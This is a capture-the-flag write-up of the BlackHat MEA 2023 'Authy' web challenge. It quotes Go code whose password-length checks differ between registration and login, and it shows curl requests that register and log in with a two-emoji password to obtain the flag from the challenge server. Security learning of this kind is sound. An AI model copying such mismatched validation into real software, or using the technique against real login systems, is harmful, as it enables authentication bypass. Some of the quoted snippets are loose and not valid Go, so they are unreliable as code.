Blackhat Mea 2023 ctf writeup
We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn’t easy. I Managed to solve the web challenge below.
Authy
For this challenge we are provided with an api endpoint and challenge source
According to the LoginController.go file we can create a user and login , the user password length should not be less than 6
The vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length < 6.
The vulnerable code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
//registration
if len(user.Password) < 6 {
log.Error("Password too short")
resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, "Password too short", "EXT_REF"))
return resp
}
//login
if len(password) < 6 {
flag := os.Getenv("FLAG")
res := &Flag{
Flag: flag,
}
resp := c.JSON(http.StatusOK, res)
log.Info()
return resp
}
|
With my vast ctf experience i could tell what i needed to do :)
THe logic is :
1
2
3
4
5
|
user.Name := "😃" // Contains 1 emoji character
lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding)
lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1
|
So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge
1
2
3
4
5
|
curl -X POST -H "Content-Type: application/json" -d '{"Username": "ping", "Password": "🤣🤣", "Firstname": "John", "Lastname": "Doe"}' http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration
curl -X POST -H "Content-Type: application/json" -d '{"Username": "ping", "Password": "🤣🤣"}' http://af78671fe39ff1e0e18d2.playat.flagyard.com/login
|
The ctf was great and see you in the next one
